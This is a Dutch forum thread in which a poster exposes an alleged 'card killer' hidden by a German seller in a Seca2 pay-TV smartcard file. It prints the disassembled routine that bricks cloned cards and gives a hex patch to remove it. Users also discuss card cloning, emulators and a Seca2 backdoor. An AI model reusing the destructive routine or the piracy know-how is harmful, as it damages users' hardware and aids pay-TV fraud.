Satshop uit Dld vernielt moedwillig smartcards

[Ron]

Een bedrijf uit duitsland dat zich naast de verkoop van satelliet apparatuur ook bezig houdt met de verkoop van zogenaamde "titanium" smartcards blijkt de concurrentie uit de weg te ruimen door smartcards van concurrenten moedwillig te vernielen.

Uit onomstotelijk bewijs dat wij gisteren ontvingen, blijkt dat een van de programmeurs van Sat-army genaamd M. O. D. in de seca2 titanium file een softwarematige BOM heeft ingebouwd.

Deze bom zorgt er voor dat de kaart volledig onbruikbaar wordt (als in de "kopie" titanium niet dezelfde transport code gebruikt is) en mensen met een schadepost van +/- 35 Euro komen te zitten. De kaart valt wegens het herprogrammeren met een schadelijk bestand, niet onder de garantie waardoor de klant hiervan uiteindelijk de dupe is geworden.

Uit de nu volgende gedisassembleerde code kun je vrij eenvoudig zien wat men met de seca2 file heeft uitgevreten, alleen omdat men bang was een paar euro minder te verdienen.

 

105E 9533 inc r19

105F F481 brne 0x1070 ; -> ok: titanium transport code

1060 E000 ldi r16,0x00 ; 0x0400

1061 E014 ldi r17,0x04

1062 EF2C ldi r18,0xFC ; 0x2AFC (= pgmadr 0x157E, killvec)

1063 E23A ldi r19,0x2A

1064 E248 ldi r20,0x28 ; 0x0028

1065 E050 ldi r21,0x00

1066 940E 1672 call 0x1672 ; copy

1068 E000 ldi r16,0x00 ; 0x0000

1069 E010 ldi r17,0x00

106A E020 ldi r18,0x00 ; 0x0400

106B E034 ldi r19,0x04

106C E248 ldi r20,0x28 ; 0x0028

106D E050 ldi r21,0x00

106E 940E 1592 call 0x1592 ; flash 0x28 bytes intvec_kill to 0x0000

1070 C246 rjmp 0x12B7

 

157E killvec:

157E hloop:

157E CFFF rjmp hloop

157F 0000 nop

1580 CFFD rjmp hloop

1581 0000 nop

1582 CFFB rjmp hloop

1583 0000 nop

1584 CFF9 rjmp hloop

1585 0000 nop

1586 CFF7 rjmp hloop

1587 0000 nop

1588 CFF5 rjmp hloop

1589 0000 nop

158A CFF3 rjmp hloop

158B 0000 nop

158C CFF1 rjmp hloop

158D 0000 nop

158E CFEF rjmp hloop

158F 0000 nop

1590 CFED rjmp hloop

 

Hieruit blijkt maar weer dat onze oproep tot een boycot van dergelijke producten niet voor niets is geweest. Ik zag dit soort smerige trucs al aankomen. Dat krijg je als je qua software helemaal afhankelijk bent van de commersie.

Ook vorig jaar waarschuwden wij maanden voor de bewuste toestanden op 1 april al voor een mogelijke "aanslag" tegen de magic module's en hun clones.

Nu waarschuwden we weer, maar helaas blijken veel mensen daar niet gevoelig voor.

 

Tox.

[wammeswaggel]

Zo'n disassembler die labels genereert wil ik graag hebben.

[Ron]

Die labels zijn zelf toegevoegd commentaar uiteraard. Als je zelf een beetje thuis bent met IDA 4.6 kun je het zelf disassembleren/bekijken en weet je dat ik gelijk heb!

 

Tox.

[bbbb]

Kijk Toxic Zo moet je het doen keihard bewijs .Nu kunnen ze er niet meer om heen.Nu heb ik ook geentwijfels over je meer.

 

Een woord klasse <img src="/ubbthreads/images/graemlins/xyxthumbs.gif" alt="" />

[Ron]

Je kunt het ook uit de seca2 file patchen en testen:

 

oud:

:102080008A046C2F7D2F2A2E3B2E3FEFECE6F0E2E8

nieuw:

:102080008A042EC07D2F2A2E3B2E3FEFECE6F0E295

[Ron]

Iemand verwijderde net een bericht waar ik op wilde antwoorden.

BBB vroeg of er een originele seca2 kaart in de titanium zit.

 

Nee, een titanium kaart is gewoon een Atmel 3232C. De kaart heeft maar een hele kleine 32KB eeprom (de helft van een funcard 2) en kan dus nooit de zogenaamde 6 in 1 files herbergen.

Deze kaart is door de commersie alleen maar gekozen omdat hij moeilijk te kraken is en ze dus hun files op een redelijke veilige manier kunnen verspreiden, de klant helemaal afhandelijk van deze kaartenmaffoisi's is en de kaart moeilijk te kopieeren is.

Natuurlijk zit de rest ook niet stil en kopieerde de kaart al snel. De slimme jongens deden dat inclusief transport code en de minder slimme jongens vergaten dat of waren gewoon te dom.

Nu was men in Duitsland bang dat men minder aan de kaart zou gaan verdienen (meer concurentie betekend scherpere prijzen en dus minder winst) en daarom maakte men dus snel even deze seca2 cardkiller file.

De file is net zoals bij de funfiles gewoon een emulator en niet een kopie van een originele kaart. Ik heb al eerder gezegd dat Seca2 niet volledig gekraakt is. Er staat alleen een backdoor van de V7 kaart uit italie open. De Nederlandse kaart (maar ook die van spanje en frankrijk) is veel beter beveiligd (nieuwe versie met andere hashtables).

Je mag er op rekenen dat sky italie dit gat heel snel gedicht zal hebben en er keihard opgetreden zal worden tegen de kaartenmaffia.

 

Tox.

[bbbb]

Bedank voor je antwoord

[wammeswaggel]

De programmeur die dit gemaakt heeft zal wel in z'n NOPjes zijn.

[Ron]

Hahaha, leuke woordspeling:-)))

[Gast]

Kabouter Plopsaland, Klus zegt: Ik word hier zo moe van......

 

Boycotten, hetzes etc.

 

Waarom hoor ik dat nu pas al die boycots tegen genoemde bedrijven als DMM, Sat Army ed. Dit is toch al langer bekend wat die bedrijven zich menen te permiteren jegens de argeloze sat gebruiker.

 

Het interesseert een sat hobbyist geen ene reet welke vete tussen wie wordt uitgevochten. De spullen die geleverd moeten worden, dienen deugdelijk te zijn. En alle shit eromheen worden door de commercie bedacht, zoals timebombs ed. De handelaren en weggepromoveerde handelaren die er een onderling vechtpartijtje van maken.

En de gewone sat hobbyist zal daar weer eens de dupe van worden.

 

 

Moraal van het verhaal: Wie is de klos -> de CONSUMENT.

[Ron]

Citaat:

Moraal van het verhaal: Wie is de klos -> de CONSUMENT.

 

Vandaar ook dus de waarschuwingen <img src="/ubbthreads/images/graemlins/smirk.gif" alt="" />

[Gast]

*****

 

Mee eens !

 

Sjoemie

[Ron]

Als jij naderhad je berichten gaat editten moet ik dat ook doen <img src="/ubbthreads/images/graemlins/blush.gif" alt="" />

Feit is dat wij vorig jaar al waarschuwden voor de Magic module bom en dat soort waarschuwingen natuurlijk in het belang van de consument worden geplaatst.

Ik begrijp jouw probleem daarmee dus niet. We staan toch aan dezelfde kant?

 

Tox.

[Gast]

Tuurlijk staan wij als consument aan dezelfde kant.

 

Maar wat ik bedoel is dat de jan met de pet, altijd de dupe is tussen vetes van handelaren onderling. De een zijn dood is blijkbaar de ander zijn brood.

 

Dat je tegenwoordig in de sathobby moet nadenken welke gevolgen een image wissel of software wissel voor gevolgen kan hebben, dat is toch te belachelijk voor woorden.

 

Lijkt mij nu toch duidelijk.

[Toine]

Kan dit ook gevaarlijk zijn voor de dreambox (als je de soft-emu voor sky-italia gebruikt)?